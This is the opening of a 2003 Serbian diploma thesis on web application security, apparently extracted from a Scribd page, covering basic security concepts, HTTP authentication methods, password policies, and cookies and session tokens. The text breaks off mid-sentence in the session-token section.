P. 1
8005074 Bezbednost Web Aplikacija

8005074 Bezbednost Web Aplikacija

|Views: 83|Likes:
Published by nahla88

More info:

Published by: nahla88 on Dec 06, 2010
Copyright:Attribution Non-commercial

Availability:

Read on Scribd mobile: iPhone, iPad and Android.
download as PDF, TXT or read online from Scribd
See more
See less

12/30/2011

pdf

text

original

Sections

 • 1.1.Osnovni bezbednosni koncepti
 • 1.2.Web aplikacije
 • 1.3.HTTP i bezbednost Web aplikacija
 • 2.AUTENTIFIKACIJA
 • 2.1.Korisnička autentifikacija
 • 2.1.2.HTTP Digest
 • 2.1.3.Autentifikacija na osnovu formi
 • 2.1.4.Digitalni sertifikati (SSL i TLS)
 • 2.2.Entitetska autentifikacija
 • 2.2.1.Autentifikacija infrastrukture
 • 2.3.Sistemi autentifikacije zasnovani na lozinkama
 • 3.UPRAVLJANJE KORISNIČKIM SESIJAMA
 • 3.2.Sesijski tokeni (Session Tokens)
 • 3.3.SSL i TLS
 • 3.3.1.Kako SSL i TLS rade?
 • 3.3.2.SSL pregovaranje sa autentifikacijom samo servera
 • 3.3.3.SSL sa klijentskom i serverskom autentifikacijom
 • 4.KONTROLA PRISTUPA I AUTORIZACIJA
 • 4.1.Diskretna kontrola pristupa
 • 4.2.Obavezna (Mandatory) kontrola pristupa
 • 4.3.Kontrola pristupa zasnovana na ulogama (RBAC)
 • 5.PRAĆENJE RADA - Event Logging
 • 5.1.Šta uneti u log zapis
 • 5.2.Obrada log zapisa
 • 6.VALIDACIJA PODATAKA
 • 6.1.Strategije validacije
 • 6.1.1.Prihvati samo poznate validne podatke
 • 6.1.2.Odbaci podatke za koje se zna da nisu validni
 • 6.1.3.Saniraj sve podatke
 • 6.2.Nikada se ne oslanjati na validaciju podataka sa strane klijenta
 • 7.BEZBEDNOSNI PROBLEMI PRI RADU WEB APLIKACIJA
 • 7.1.Napadi na korisnike
 • 7.1.1.Cross-site scripting
 • 7.2.1.Direktne SQL naredbe
 • 7.2.2.Direktne OS naredbe
 • 7.2.3.Otkrivanje putanje dokumenta
 • 7.2.4.Uključivanje udaljenih datoteka
 • 7.2.5.Nulti bajtovi
 • 7.2.6.URL kodiranje
 • 7.3.Manipulacija parametrima
 • 7.3.1.Manipulacija Cookie-a
 • 7.3.2.Manipulacija HTTP zaglavljima
 • 7.3.3.Manipulacija poljima HTML formi
 • 7.3.4.URL manipulacija
 • 7.4.Ostali načini manipulacije
 • 7.4.1.Konfiguracija sistema
 • 7.4.2.Komentari u HTML
 • 7.4.3.Stari, bekapovani i fajlovi bez reference
 • 7.4.4.Debug naredbe
 • 7.4.5.Default (inicijalni) nalozi
 • 8.PROBLEMI PRIVATNOSTI
 • 8.1.Opasnosti pri upotrebi javnih Web browser-a
 • 8.2.Upotreba ličnih podataka
 • 8.3.Opcija «Browser History»
 • 9. ZAKLJUČAK
 • 10. LITERATURA
 • REČNIK

BEZBEDNOST WEB APLIKACIJA

Autor: Stevan Džigurski

Novi Sad, 2003.

SADRŽAJ
1. UVOD...........................................................................................................................................................4 1.1. OSNOVNI BEZBEDNOSNI KONCEPTI................................................................................................................5 1.2. WEB APLIKACIJE.......................................................................................................................................6 1.3. HTTP I BEZBEDNOST WEB APLIKACIJA........................................................................................................7 2. AUTENTIFIKACIJA.................................................................................................................................8 2.1. KORISNIČKA AUTENTIFIKACIJA.....................................................................................................................8 2.1.1. HTTP Basic...................................................................................................................................8 2.1.2. HTTP Digest.................................................................................................................................9 2.1.3. Autentifikacija na osnovu formi..................................................................................................10 2.1.4. Digitalni sertifikati (SSL i TLS)..................................................................................................11 2.2. ENTITETSKA AUTENTIFIKACIJA....................................................................................................................11 2.2.1. Autentifikacija infrastrukture......................................................................................................11 2.3. SISTEMI AUTENTIFIKACIJE ZASNOVANI NA LOZINKAMA....................................................................................12 3. UPRAVLJANJE KORISNIČKIM SESIJAMA.....................................................................................14 3.1. COOKIES................................................................................................................................................14 3.2. SESIJSKI TOKENI (SESSION TOKENS)...........................................................................................................15 3.3. SSL I TLS ...........................................................................................................................................16 3.3.1. Kako SSL i TLS rade?.................................................................................................................17 3.3.2. SSL pregovaranje sa autentifikacijom samo servera .................................................................17 3.3.3. SSL sa klijentskom i serverskom autentifikacijom......................................................................18 4. KONTROLA PRISTUPA I AUTORIZACIJA.......................................................................................19 4.1. DISKRETNA KONTROLA PRISTUPA................................................................................................................19 4.2. OBAVEZNA (MANDATORY) KONTROLA PRISTUPA ..........................................................................................20 4.3. KONTROLA PRISTUPA ZASNOVANA NA ULOGAMA (RBAC).............................................................................20 5. PRAĆENJE RADA - EVENT LOGGING.............................................................................................22 5.1. ŠTA UNETI U LOG ZAPIS............................................................................................................................22 5.2. OBRADA LOG ZAPISA................................................................................................................................23 6. VALIDACIJA PODATAKA.....................................................................................................................24 6.1. STRATEGIJE VALIDACIJE.............................................................................................................................24 6.1.1. Prihvati samo poznate validne podatke......................................................................................24 6.1.2. Odbaci podatke za koje se zna da nisu validni...........................................................................25 6.1.3. Saniraj sve podatke.....................................................................................................................25 6.2. NIKADA SE NE OSLANJATI NA VALIDACIJU PODATAKA SA STRANE KLIJENTA........................................................25 7. BEZBEDNOSNI PROBLEMI PRI RADU WEB APLIKACIJA........................................................26 7.1. NAPADI NA KORISNIKE..............................................................................................................................26 7.1.1. Cross-site scripting.....................................................................................................................26 7.2. NAPADI NA SISTEM...................................................................................................................................28 7.2.1. Direktne SQL naredbe................................................................................................................28 7.2.2. Direktne OS naredbe...................................................................................................................30 7.2.3. Otkrivanje putanje dokumenta....................................................................................................31 7.2.4. Uključivanje udaljenih datoteka.................................................................................................31 7.2.5. Nulti bajtovi................................................................................................................................32 7.2.6. URL kodiranje.............................................................................................................................33 7.3. MANIPULACIJA PARAMETRIMA....................................................................................................................35 7.3.1. Manipulacija Cookie-a...............................................................................................................35

2

7.3.2. Manipulacija HTTP zaglavljima................................................................................................36 7.3.3. Manipulacija poljima HTML formi............................................................................................37 7.3.4. URL manipulacija.......................................................................................................................38 7.4. OSTALI NAČINI MANIPULACIJE....................................................................................................................40 7.4.1. Konfiguracija sistema.................................................................................................................40 7.4.2. Komentari u HTML.....................................................................................................................40 7.4.3. Stari, bekapovani i fajlovi bez reference.....................................................................................41 7.4.4. Debug naredbe............................................................................................................................42 7.4.5. Default (inicijalni) nalozi...........................................................................................................43 8. PROBLEMI PRIVATNOSTI...................................................................................................................44 8.1. OPASNOSTI PRI UPOTREBI JAVNIH WEB BROWSER-A.......................................................................................44 8.2. UPOTREBA LIČNIH PODATAKA.....................................................................................................................44 8.3. OPCIJA «BROWSER HISTORY»...................................................................................................................44 9. ZAKLJUČAK..........................................................................................................................................45 10. LITERATURA.......................................................................................................................................46 REČNIK.......................................................................................................................................................47

3

1.UVOD
Ekspanzija popularnosti Interneta koja se odigrala u prethodnoj deceniji, kao i promovisanje Web browsera kao platforme za distribuciju aplikacija, doveli su do toga da razvoj Web aplikacija predstavlja oblast u kojoj se računari danas najviše koriste. Web bezbednošću se oduvek bavila mala grupa ljudi koja se obicno fokusirala na bezbednost mreža i operativnih sistema. Pojavom sve složenijih Web aplikacija i Web servisa kao i činjenica da se na njima nalazi velika količina poverljivih informacija povlači sa sobom veliku odgovornost programera koji ih kreiraju. Rad se sastoji iz više celina. U prvom poglavlju predstavljeni su osnovni bezbednosni koncepti, pojmovi Web aplikacija i Web servis, kao i mesto i uloga HTTP protokola u bezbednosti Web aplikacija. Tema drugog poglavlja je autentifikacija kao najosetljiviji deo Web aplikacije. Predstavljeni su tipovi autentifikacije, načini na koji funkcionišu, kao i prednosti i mane svakog. Naredno poglavlje se odnosi na mehanizme upravljanja korisničkim sesijama, bez kojih se ne može zamisliti ni jedna Web aplikacija. Naredna tri poglavlja se odnose na kontrolu pristupa i autorizaciju, praćenje rada (logging), i validaciju podataka. U poglavlju «Bezbednosni problemi Web aplikacija» opisani su načini na koji se vrše «napadi» na Web aplikaciju, kao i rešenja za njihovo sprečavanje ili ublažavanje. Osmo poglavlje diplomskog rada bavi se privatnošću korisnika Web aplikacija. U poslednjem poglavlju ovog rada prikazana je konkretna realizacija intranet Web aplikacije namenjena timskom radu na projektima, uz osvrt na prethodno izloženu metodologiju.

4

1.1.Osnovni bezbednosni koncepti
Osnovni bezbednosni koncepti koji su važni za informacije na Internetu su raspoloživost, integritet i poverljivost. Raspoloživost se primarno definiše kao mogućnost sistema da pruži uslugu ovlašćenom korisniku. Ovlašćeni korisnici su korisnici kojima su namenjene usluge sistema kako je naznačeno u njegovoj specifikaciji. Svi ostali korisnici osim ovlaštenih korisnika smatraju se neovlaštenim korisnicima. Bezbednost informacija

Poverljivost prevencija neovlašćenog otkrivanja informacija

Integritet prevencija neovlašćene modifikacije informacija

Raspoloživost prevencija neovlašćenog zadržavanja informacija

Integritet predstavlja prevenciju neovlašćene modifikacije, brisanja ili uništavanja elemenata sistema. Integritet je narušen u slučaju napada, koji obično izvršavaju neovlašćeni korisnici, ali koji takođe može izvršiti i ovlašćeni korisnici koji zloupotrebljavaju svoja ovlašćenja. Zbog toga integritet karakteriše mogućnost sistema da se odupre napadima. Poverljivost je mogućnost sistema da onemogući neovlašćenim korisnicima pristup poverljivim informacijama. U stvarnosti time se definiše do koje mere neka informacija treba da je dostupna, odnosno nedostupna neovlašćenim korisnicima. Poverljivost se takođe može posmatrati u širem smislu, odnosno kao prevencija pružanja usluge neovlašćenim korisnicima, čak i ako pružanje takve usluge ne bi značilo štetu za ovlašćene korisnike ili otkrivanje tajnih informacija. Bezbednosni koncepti koji se odnose na osobe koje koriste informacije su autentifikacija, autorizacija i neporecivost. Da bi učinili informaciju dostupnom onome kome je potrebna i kome se može verovati koriste se autentifikacija i autorizacija. Autentifikacija je proces utvrđivanja da li je korisnik, odnosno entitet, ono što tvrdi da jeste. Autorizacija podrazumeva proveru da li određeni korisnik (ili sistem) ima dozvolu da vrši određenu akciju, pod pretpostavkom da se prethodno autentifikovao. Neporecivost je mogućnost sistema da onemogući korisniku poricanje prethodno izvršene akcije.

5

On takodje može uključiti komponente aplikacije koje kreiraju izgled stranice. Jedan Web servis može koristiti drugi da napravi bolje karakteristike za krajnjeg korisnika. Java. On omogućava realizaciju poslovne logike. 6 . Web servisi su namenjeni za kreiranje otvorenih distributivnih sistema koji omogućavaju kompanijama i individualnim korisnicima da brzo i jeftino učine da svoje informacije dostupnim širom svetske mreže. Za korisnike. Web server pruža podatke. Funkcije koje se izvode mogu biti jednostavni zadaci kao pretraga lokalnog direktorijuma do visoko sofisticiranih aplikacija koje vrše npr. upotreba više podataka i prezentovanje istih do nivoa prezentacije za slanje korisniku. Web servisi se zasnivaju na XML-u (extensible Markup Language) i SOAP-u (Simple Object Access Protocol). Nivo aplikacije može uključiti tehnologije kao što su: CGI.Web aplikacije Web aplikacije imaju klijent/server arhitekturu koja omogućuje interakciju sa korisnicima ili drugim sistemima koristeći HTTP protokol. a Web browser ih «slaže» u čitljivu formu koju korisnik može da interpretira.2. Krajni korisnik vidi Web stranice i on je sposoban da vrši interakciju slanjem izbora.. B2B i B2C. prodaju u realnom vremenu. Nivo podataka se koristi za skladištenje podataka potrebnih za aplikaciju i odgovoran je za privremene i stalne podatke. Nivo prezentacije Aplikacioni nivo Nivo podataka Nivo prezentacije je odgovoran za prezentovanje podataka ka krajnjem korisniku ili sistemu. . obično su pokretane na Web serveru povezane na jednostavnije baze podataka ( takodje na istom serveru).1.. Tradicionalno jednostavne aplikacije. Aplikacioni nivo je pokretač Web aplikacije. obradu ulaznih podataka. Tehnologije koja omogućavaju rad Web aplikacija veoma se brzo razvijaju. pravljene sa CGI (Common Gateway Interface). donošenje odluka. Web servisi predstavljaju kolekciju funkcija koje su upakovane kao celina i publikovane na mrežu za upotrebu od strane drugih programa. Apache i MS IIS. Ovaj nivo prezentacije uključuje Web servere kao što su npr. Moderne aplikacije su tipično napisane u Javi (ili sličnim jezicima ) i pokretane na aplikacionim serverima povezane sa više baza podataka. To takodje dopušta korisniku da odgovori slanjem povratnih parametara koje Web server propušta kroz aplikaciju. klijent je najčešće Web browser kao što je Internet Explorer ili Netscape Navigator. Savremeni sistemi skladište podatke u XML formatu radi lakše komunikacije sa drugim sistema.NET servisi ili PHP. Web servisi za iznajmljivanje automobila i avio prevoz su primeri.

3. Završni udarac su dali Web servisi (REST. korisnici šalju HTTP zahteve za određene stranice. HTTP server interpretira zahtev i šalje odgovarajući odgovor klijentu.1. bez ikakvih prepreka prolaze kroz firewall-ove zato što su oni deo legalnog HTTP zahteva. Klijent šalje zahtev HTTP serveru.HTTP i bezbednost Web aplikacija Sa tehničke strane. HTTP klijent Aplikacioni nivoNivo prezentacij eNivo sesijeTrans portni nivoMrežni nivoNivo podatakaFiz ički nivo HTTP server Aplikacioni nivoNivo prezentacij eNivo sesijeTrans portni nivoMrežni nivoNivo podatakaFiz ički nivo HTTP zahtev predstavljen preko OSI referentnog modela Kada je Web aplikacija postavljena na Web server. osnovni protokol na mreži je HTTP protokol. Protokol radi na aplikacionom nivou. XML i SOAP). Napadi zlonamernih korisnika koji se nalaze u tim zahtevima. 7 . koji omogućavaju da se kroz samo jedan port provuku razni formati dokumenata. Njegova jednostavnost načinila ga je vrlo popularnim.

što predstavlja entitetsku autentifikaciju.2.1. dok se entitetska autentifikacija vrši prilikom svakog zahteva. •Entitetska autentifikacija je proces određivanja da li je entitet (sesijski token) ono što tvrdi da jeste.AUTENTIFIKACIJA Autentifikacija je proces utvrđivanja da li je korisnik. Web browser šalje zahtev serveru za pristup zaštićenim stranicama. ono što tvrdi da jeste. HTTP klijent. npr. Web server vraća klijentu HTTP 401 statusni kod: HTTP/1.1 401 Authorization Required Zatim klijent šalje drugi zahtev ovaj put uključujući Authenticate header koji sadrži njegove akreditive za serverov upit. Razmotrimo situaciju kada korisnik pristupa stranicama za administraciju jednog elektronskog trgovinskog sajta. a šta je upravljanje sesijama (session management). Korisnička autentifikacija se vrši samo jednom u toku sesije. To omogućava browseru da pošalje sesijski token svaki put kada je upućen novi zahtev. Kada je prvi put uspešno izvršena autentifikacija. Posle uspešno obavljene korisničke autentifikacije sistem vrši entitetsku autentifikaciju koja je potrebna u slucaju da želimo da pređemo na neku drugu stranicu. sesijski token (session token) je postavljen u korisnikov browser. Postoje dva tipa autentifikacije: •Korisnička autentifikacija je proces određivanja da li je korisnik ono što tvrdi da jeste. odnosno entitet.HTTP Basic HTTP protokol definiše jednostavan okvir za autentifikaciju.1. u suprotnom šalje odgovor 401 neautorizovanog pristupa da obavesti klijenta da je autentifikacija propala.Korisnička autentifikacija 2. Najjednostavniji metod je HTTP Basic autentifikacija. 8 . Ako server prihvati akreditive klijenta poslaće traženu stranicu.1. Postoji više načina za obavljanje korisničke autentifikacije preko HTTP-a. a da izbegnemo ponavljanje korisničke autentifikacije. Korisnici su obično autentifikovani sa korisničkim imenom i lozinkom ili sličnim mehanizmom. 2. skladišten u cookie. Često dolazi do zabune šta je autentifikacija.

2. Kao što je već rečeno. 4. kriptovani base64 metodom. GET:/index. HTTP 1.Izračunava se MD5 hash funkcija od “A2”. 5. Ona je bazirana na pretpostavci da je veza između klijenta i servera sigurna. Mehanizam HTTP Digest autentifikacije razvijen je da omogući generalnu upotrebu. 9 . koje zahteva eskplicitnu autetifikaciju se dodaje. -obostranu autentifikaciju. Takođe. koja pruža dodatno zaštitu za: -napade ponavljanjem. -integritet zaštite.HTTP Digest Postoje dve forme HTTP Digest autentifikacije koje su napravljene da spreče problem presretanja korisničkog imena i lozinke. ova autentifikacija ima problem da ne postoji mehanizam za “logout”. što pri upotrebi jednog Web browser-a od strane više korisnika stvara problem. Svrha HTTP Digest autentifikacione šeme je da omogući korisnicima da dokažu svoje korisničko ime i lozinku bez otkrivanja aktuelne lozinke.1. Oni se šalju serveru odvojeni karakterom “:”. kao i kod HTTP Basic autentifikacije. a unapređena je za HTTP 1. 2. Ovako izgleda izračunavanje: 1.Izračunava se MD5 hash funkcija ovakvog stringa.0.Izračunava se MD5 hash ovih stringova (128 bitni heksadecimalni izlaz).HTTP Basic autentifikacija se zasniva na modelu da se korisnik mora autentifikovati sa korisničkim imenom i lozinkom (koji se obično unose u dialog box) za svaki domen. 2.php).neautorizovani pristup. Zagljavlje WWW-Authenticate header.1 specificira unapređenu digest šemu. Proces autentifikacije počinje sa odgovorom 401 . 6. HTTP Digest mehanizam koristi MD5 hash algoritam. Originalna specifikacija je razvijena kao jedna ekstenzija za HTTP 1. nakon čega se generiše dodatni parametar nonce i izračunava digest. 3.string “A1” se sastoji od korisničkog imena.org:password. Važan deo pri sprovođenju autentifikacije je slanje dodatnih podataka.1. U slučaja da se sa zahtevom ne šalju jedinstveni podaci napadač bi bio u mogućnosti da jednostavno ponovi digest. jednostavnu implementaciju i autentifikacioni mehanizam koji se može koristiti preko kanala koji nisu kriptovani. oblasti i lozinke koji su spojeni dvotačkama : owasp:users@owasp.String “A2” se sastoji od HTTP metoda i URI-a (npr.Spajaju se A1 i A2 sa dvotačkama. HTTP Basic autentifikacija je nesiguran metod filtriranja neautorizovanog pristupa resursima na HTTP serveru.

Najbolji pristup je da se ostavi prazno polje za lozinku i da se od korisnika zahteva da potvrdi trenutnu lozinku. 2. Poboljšana digest šema u HTTP 1. nekome sa fizičkim pristupom računaru. Od suštinske važnosti je da se forme autetifikacije podnose upotrebom HTTP POST zahteva.1 šeme su integritet zaštite i obostrana autentifikacija. Ovo omogućava projektantima da predstave zahtev za korisničkim podacima (korisničko ime i lozinka) kao normalni deo aplikacije sa svim HTML mogućnostima koje se odnose na internacionalizaciju i pristupačnost. Web bazirane aplikacije koriste kod sadržan u samim Web stranicama. Korisnik koji se vraća na prethodno korišćenu aplikaciju može želeti da potvrdi informacije o svom profilu.1. “View Source” će ponovo otkriti lozinku u vidu običnog teksta. Server mora da proveri da li je NC veći od poslednje primljene NC vrednosti koju je primio. U većini slučajeva stranica za izmenu lozinke treba da se nalazi odvojeno od ostalih podataka vezanih za korisnički profil. Druga poboljšanja HTTP 1.Digest šema u HTTP 1. podatke (korisničko ime i lozinku) prenose u vidu običnog teksta. što klijentima omogućuje da autetifikuje servere. Većina aplikacija će prethodno popuniti formu sa trenutno važećim podacima i zahtevati od korisnika da izmeni podatke koji su netačni. Korisnici mogu nepažnjom da ostave prethodno popunjenu formu na ekranu dopuštajući pri tome. Ovaj osmocifreni broj u heksadecimalnoj predstavi se uvećava svaki put kada klijent podnese zahtev sa istim nonce-om. Ovo proizilazi iz toga što napadač može da ponovi tačno izračunati digest za isti resurs. Projektanti moraju obratiti pažnju na sledeće: ukoliko nije upotrebljen SSL. HTTP GET zahtev se pojavljuje u history-u korisnikovog browsera. tako da korisničko ime i lozinka mogu biti vidljivi i ostalim korisnicima istog browsera. Primedba: autentifikacija zasnovana na formama zahteva od projektanata sistema da izgrade autentifikacioni protokol koji će se nositi sa istim problemima koji se pravazilaze upotrebom HTTP digest-a. forme podnete upotrebom HTTP GET ili HTTP POST zahteva. detaljniji pregled će biti dat u daljem tekstu. Isto tako. kao i serverima da autentifikuje klijente.0 je osetljiva na napade ponavljanjem. kao i dva polja za unos i potvrdu nove lozinke. Ovakav pristup ima dve prednosti. te da pošalje isti zahtev serveru. Polja sa lozinkama aplikacija nikada ne treba da popunjava.Autentifikacija na osnovu formi Umesto oslanjanja na autentifikaciju na nivou protokola. ako aplikacija dopusti (kroz neki bezbednosni propust) drugom korisniku da vidi stranicu sa prethodno popunjenom lozinkom za nalog drugog korisnika. Uobičajena šema u Web aplikacijama je da se korisniku prethodno popune polja kad god je to moguće.1 uključuje NC parametar ili brojanje nonce-a u autorizaciono zaglavlje. da otkrije lozinku. 10 . te da ne uvaži ponovljene zahteve.3.

Razni formati sertifikata nalaze se u upotrebi.1.Entitetska autentifikacija Upotreba cookie-a Cookie-ji se često koriste za autentifikaciju korisničkog browser-a. Napomena o referer zaglavlju: Referer zaglavlje se šalje sa HTTP zahtevom klijenta da bi se utvrdilo na koj način je klijent došao do URL-a tražene stranice. Većina Web sajtova radi isključivo sa autentifikacijom na serverskoj strani.Digitalni sertifikati (SSL i TLS) SSL (Secure Socket Layer) i TLS (Transport Layer Security) mogu da obezbede klijentsku. IP adrese ili DNS nazivi su naizgled načini za autentifikaciju. ovakvo zaglavlje stvara korisnikov browser.2. tako da korisnik može da menja ovo zaglavlje. ova metoda bi trebalo da se koristi jedino za brzu i letimičnu proveru. Ova tematika je detaljnije opisana u delu koji se odnosi na upravljanje sesijama.Autentifikacija infrastrukture DNS nazivi Česte su situacije u kojima aplikacija treba da autentifikuje druge servere ili aplikacije. te ga zbog toga ne bi trebalo koristiti za autentifikaciju. Najšire prihvaćen je X509 v3 sertifikat International Telecommunication Union-a (pogledati RFC 2459).1. Digitalni sertifikati su mehanizmi za autentifikaciju sistema. a pored toga predstavlaju i mehanizam za distribuciju ključeva u kriptografskim razmenama (uključujući i autentifikaciju po potrebi).2. čak i ako je autentifikacija na strani klijenta moguća. serversku ili obostranu autetifikaciju entiteta. 2. tako da je potrebno postaviti i šemu za distribuciju sertifikata. Ovakav način na prvi pogled može da se učini zgodnim za proveru da li korisnik pratio korake u određenoj aplikaciji ili je URL dobio sa poverljivog domena (trusted domain). 2. Za sisteme visoke bezbednosti autentifikacija na klijentskoj strani je neophodna. Još jedan raširen kriptografski protokol za poruke je PGP. Iako su delovi komercijalnog PGP-a svojinski zaštićeni. Digitalni sertifikati se najviše koriste u Web sistemima pri konektovanju na bezbedne (secure) Web sajtove (SSL). OpenPGP Alliance predstavlja grupe koje koriste OpenPGP standard (RFC 2440). Međutim usled specičfinih nedostataka vezanih za bezbednost DNS-a.2. Detaljni opisi mehanizama mogu se naći u SSL i TLS delovima ovog rada.4. Prevara sa IP adresama 11 . kao deo mehanizma za upravljanje sesijama. Međutim.

Ovakva skladišta moraju biti bezbedna. svaka sa svojim prednostima i manama. Lozinke ne bi trebalo da budu dostupne administratorskim korisnicima na uvid. Usled različitih zahteva koje šema održavanja lozinki treba da zadovolji. Zaključavanje lozinki Ako se napadaču ne spreči. kao na primer.. U daljem tekstu su data različita rešenja. Za jaču autentifikaciju treba upotrebiti X. 2. Kao i uvek.3. Ovo je najviše zbog ljudskog faktora.509 sertifikat ili implementirati SSL. te se samo donekle može ublažiti tehničkim sredstvima. Deosta je česta tehnika da se nad lozinkama koriste hash fukcije (kao što je SHA-1). Preporučljiv broj pokušaja logovanja je pet. Vrlo je verovatno da će pogoditi. lozinke su često najslabija karika u arhitekturi autentifikacije. Kako sistem zaključavanja lozinki treba da štiti od napada. pri čemu jedan alfanumerik. U Web aplikacijama posebnu pažnju treba posvetiti metakarakterima. Moguće je da napadač pokuša da pogodi veći broj slučajno izabranih lozinki na poznatim nalozima te tako zaključa ceo sistem korisnika. U opštem slučaju trebalo bi koristiti gethostbyaddr() . Sprovođenje kvaliteta lozinki Pojam kvaliteta lozinke se odnosi na entropiju lozinke i od presudne je važnosti za bezbednost korisničkih naloga. Ime koje je na neki način izvedeno od korisnikovog ličnog imena može napadaču da nagovesti o kome se radi i sl. sistemi za implementaciju autentifikacije bi trebalo da procenjuju rizik i prednosti za svaki od mogućih modela pretnje. Mehanizme sprečavanja nagađanja lozinke trebalo bi postaviti tako da blokiraju nalog u slučaju kada broj pokušaja logovanja pređe neku unapred zadatu vrednost. jedan specijalan karakter (a da nije u A-Z ili 0-9). tako da bi projektanti trebalo to da imaju na umu. Skladištenje korisnčkih imena i lozinki Svaki sistem mora da sadrži skladište sa korisničkim imenima i odgovarajućim lozinkama koje će se koristiti u procesu autentifikacije. Ovakvi mehanizmi. Druga korisnička imena. Dobru lozinku je nemoguće pogoditi. Ovakav pristup se još uvek primenjuje kod Web aplikacija koje koriste ugrađena skladišta podataka u operativnom sistemu. upotreba malih i velikih slova. međutim imaju nedostatke. broj socijalnog ili poreski broj mogu imati i zakonske posledice. Korisnička imena Iako korisnička imena sama po sebi nisu zahtevna sa aspekta bezbednosti nije loše uvesti neka ograničenja za korisnička imena. umesto gethostbyname(). Email adrese nisu dobra korisnička imena iz razloga opisanih u daljem tekstu. kao što je Windows NT. on lozinke nagađa veći broj puta. logična strategija je da se korisnički nalozi zaključaju na 12 .Prevare sa IP adresama moguće su pod određenim okolnostima. Tipična lozinka ima najmanje osam karaktera.Sistemi autentifikacije zasnovani na lozinkama Korisnička imena i lozinke su danas najčešći način autentifikacije.

ali nikada oba zajedno. Na primer za vreme registracije klijentu se može slati ili pitanje ili odgovor. Starenje i istorija lozinki Rotacija lozinki je u opštem slučaju dobra stvar.nekoliko sati. dok će pravim korisnicima pristup biti i dalje omogućen. Jedna je da se definiše skup pitanja koja se postavljaju nekome ko tvrdi da je korisnik. lozinke bi trebalo da se promene prvi put kada se novi korisnik loguje sa promenjenom lozinkom. Na ovakav način stepen entropije se znatno uvećava. Sistem za resetovanje lozinki Sistemi za resetovanje lozinki su u širokoj upotrebi. Potrebno je obratiti pažnju da se u okviru iste sesije nikada ne podnose na potvrdu zajedno pitanja i odgovori. Na ovaj način napadač će se značajno usporiti. U slučaju kada sistem koristi email adrese za dostavljanje novih lozinki korisnicima. Naravno ako se od naloga koji već “provaljen” zatraži da obnovi svoju lozinku sve prednosti nestaju. a ne da koristi ista pitanja za sve korisnike. Postoji nekoliko strategija kojima se ovo izvodi. Oni omogućavaju korisniku da resetuje svoju lozinku odmah bez pozivanja administratora. Ovo dovodi do izlaganja korisničkog naloga riziku u slučajevima kada je lozinku potrebno promeniti korisniku koji ne može da se autentifikuje. Ova pitanja bi trebalo da budu u slobodnoj formi. Ovo daje lozinkama odgovarajući životni vek. Aplikacija treba korisniku da dozvoli da izabere skup svojih pitanja i odgovora. 13 .

Cookie-ji ne mogu biti čitani niti upisivani preko nekog drugog 14 . jer on obezbeđuje sigurnost transporta. kao što može biti sakriven u HTML kodu Web stranice ili u kombinaciji ovih metoda. preko HTTP zaglavlja i JavaScript-om. Primenom mehanizma stanja omogućeno je da višestruki korisnički zahtevi budu međusobno povezani preko “sesije”. •trajne i nesigurne. Trajni cookie-ji su smešteni u tekst dokumentu na strani klijenta i traju do isteka roka (expiry date) koji je postavljen. Cookie-ji nisu dizajnirani da čuvaju korisničko ime i lozinku ili bilo koju osetljivu informaciju.1. a u ostalim vremenskim periodima je nema. trajne ili privremene. može se prenositi i preko statičnog URL-a. dajući četiri posebna tipa cookie-a: •trajne i sigurne. token sesije (session token) se prenosi između HTTP servera i klijenta.UPRAVLJANJE KORISNIČKIM SESIJAMA HTTP je protokol bez održavanja stanja (stateless). On je najčešće smešten u cookie. Sigurni cookie-ji mogu biti poslati samo preko HTTPS (SSL). Uništavaju se kada se browser isljuči ili eksplicitno kada se pokrene log-off skript. Za svaki podatak poslat klijentu smatra se da je pod kontrolom krajnjeg korisnika. stepen bezbednosti sistema će zavisiti od samog Web programera. Veoma je bitno korektno ih koristiti. Sposobnost razdvajanja i prepoznavanja akcija korisnika za određene sesije je kritična za Web sigurnost. a sada su specificirani u RFC 2965. Većina mehanizma stanja.3. Dok postoji preferirani cookie mehanizam (RFC 2965) za izgrdnju sistema zasnovanih na korisničkim sesijama.Cookies Često ospravan mehanizam koji je neophodan za primenu mnogih komercijalnih Web aplikacija (online banking i e-commerce). jer se konekcija klijenta i servera uspostavlja prilikom upućivanja klijentovog HTTP zahteva i dobijanja odgovora od servera. •privremene i sigurne. •privremene i nesigurne. Privremeni cookie-ji su smešteni u RAM-memoriji na strani klijenta. Postoje dve kategorije cookie-a: sigurne ili nesigurne. Naziv “sigurni” često dovodi do zablude. 3. bez obzira na korišćene transportne mehanizme. Cookie-ji mogu biti poslati korišćenjem dva glavna metoda. odnosno od načina na koji primenjuje cookie mehanizam. Dok nesigurni cookie-ji mogu biti poslati i preko HTTP-a i preko HTTPS-a. Cookie-ji su razvijeni od strane Neatscape-a.

Atribut / nam govori da se putanja odnosi na ceo sajt. a putanja je /reference. 3. EGADS. Posle toga svi zahtevi za taj URL od strane browsera sadržaće cookie informaciju kao dodatno zaglavlje u zahtevu. Izostavljanje ovog parametra browser će tretirati tako što će cookie smestiti u RAM i izbrisati je kada se browser isljuči.40. nepredvidivi i otporni na inverzno projektovanje.DNS domena. 1970.redhat. za veću sigurnost. 15 . Tipičan cookie koji skladišti sesijski token (session token) izgleda ovako: Domen www. korisničko ime.16 018996349247 480 Kolone ove tabele ilustruju šest parametara koji se skladište u cookie. Sigurnost: vrednost TRUE/FALSE se odnosi na to da li je SSL konekcija potrebna za dati domen da se pristupi datoj varijabli. Generalno algoritmi sesijskih tokena ne bi trebalo da koriste promenljive koje sadrže korisnikove personalne informacije kao npr. adresu i slično. Dodatno.redhat.Sesijski tokeni (Session Tokens) Svi sesijski tokeni (nezavisno od mehanizma stanja) moriju biti jedinstveni. Istek roka: predstavlja Unix-ovo vreme trajanja varijable.40. lozinku. cookie će biti poslat samo za stranice iz direktorijuma /reference.). server odgovara na zahtev sa dodatnim zaglavljem.2. Unix-ovo vreme je definisano kao broj sekundi od 00:00:00 GMT Jan 1.com. ali postoji dosta slabih tačaka u popularnim Web klijentima koji to dozvoljavaju.3.3. u ovom slučaju Apache. Domen: domen Web sajta koji je kreirao i koji može da čita promenjivu. a maksimalna veličina je 4kb. Ime: ime varijable. Yarrow. itd. To zaglavlje govori klijentu da doda te informacije u klijentov cookie dokument ili smesti tu informaciju u RAM.redhat.151.com Putanja / Sigurnost FALSE Istek vremena Ime 1154029490 Apache Vrednost 64.16018996349247480 i biće uništena 27. Ako je sve korektno klijent pri komunikaciji sa domenom A ne može čitati cookie-je domena B. za Web sajt čiji je domen http://www. jula 2006. Sesijski token treba da koristi pouzdan izvor slučajnih karaktera (kao što su generator pseudoslučajnih brojeva.com/reference . Putanja: ovaj atribut ograničava vidljivost pojedinih direktorijuma na Web serveru. sesijski tokeni treba da 